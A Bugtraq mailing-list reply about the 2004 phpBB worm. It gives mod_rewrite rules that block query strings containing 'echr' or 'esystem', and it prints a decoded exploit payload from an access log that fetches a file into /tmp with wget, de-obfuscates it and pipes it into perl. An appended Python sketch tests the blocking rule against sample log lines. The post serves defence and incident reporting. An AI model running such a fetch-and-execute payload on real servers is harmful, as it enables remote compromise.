Re: phpBB Worm
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Re: phpBB Worm
- From: Sebastian Wiesinger <bofh@xxxxxxxxxxxxx>
- Date: Wed, 22 Dec 2004 12:22:15 +0100
* Raymond Dijkxhoorn <raymond@xxxxxxxxxxxxxxx> [2004-12-22 00:06]:
> If you cannot fix it (virtual servers) fast for all your clients you could
> also try with something like this:
> RewriteEngine On
> RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
> RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
> RewriteRule ^.*$ - [F]
> We had some vhosts where this worked just fine. On our systems we didn't
> see any valid request with echr and esystem, just be gentle with it, it
> works for me, it could work for you ;)
If you use mod_security, this may help, too:
SecFilterSelective "THE_REQUEST"
I had another exploit attempt, with this payload:

- - [22/Dec/2004:10:06:47 +0100] "GET
HTTP/1.1" 200 12266 "-" "-"
Which decodes to:
rush=echo _START_; cd /tmp;wget -O .b; perl -pe
y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b *.pl b0t*;
echo _END_
GPG Key-ID: 0x76B79F20 (0x1B6034F476B79F20)
Resist the beginnings: http://odem.org/informationsfreiheit/
Thunder rolled. ... It rolled a six.
--Terry Pratchett, Guards! Guards!
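
Before deploying the quoted RewriteCond pair on shared vhosts, its test can be replayed over existing access logs to see which past requests it would have refused. This is an added example, not code from either poster: the log lines are constructed, and the "review" class (repeated percent-decoding plus lower-casing) is an assumption of this sketch, not something mod_rewrite does, since `%{QUERY_STRING}` is matched raw and case-sensitively.

```python
import re
from urllib.parse import unquote

# Substrings from the two RewriteCond lines quoted in the message.
MARKERS = ("echr", "esystem")
# The request line is the first quoted field of an Apache access-log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation addresses, made-up paths and values).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Dec/2004:10:06:47 +0100] "GET /viewtopic.php?t=1&x=AAesystemBB HTTP/1.1" 200 12266 "-" "-"',
    '192.0.2.11 - - [22/Dec/2004:10:07:02 +0100] "GET /search.php?q=filesystem HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.12 - - [22/Dec/2004:10:07:30 +0100] "GET /viewtopic.php?t=1&x=AA%2545CHRBB HTTP/1.1" 200 12266 "-" "-"',
    '192.0.2.13 - - [22/Dec/2004:10:08:11 +0100] "GET /index.php?page=2 HTTP/1.1" 200 2048 "-" "-"',
]

def query_string(log_line):
    """Raw (undecoded) query string of the logged request, or None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    return m.group("target").partition("?")[2]

def fully_decode(s, max_rounds=5):
    """Percent-decode repeatedly (bounded) to undo nested encoding."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def classify(log_line):
    """blocked: the quoted rules match (raw, case-sensitive substring).
    review: marker appears only after decoding and lower-casing.
    clean: no marker. None: no request line found."""
    q = query_string(log_line)
    if q is None:
        return None
    if any(m in q for m in MARKERS):
        return "blocked"
    if any(m in fully_decode(q).lower() for m in MARKERS):
        return "review"
    return "clean"

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), line.split('"')[1])
```

The second sample line is an ordinary search for "filesystem", which contains "esystem" and so would be refused by the rule; counting such hits in real logs shows how gentle the filter is on a given vhost.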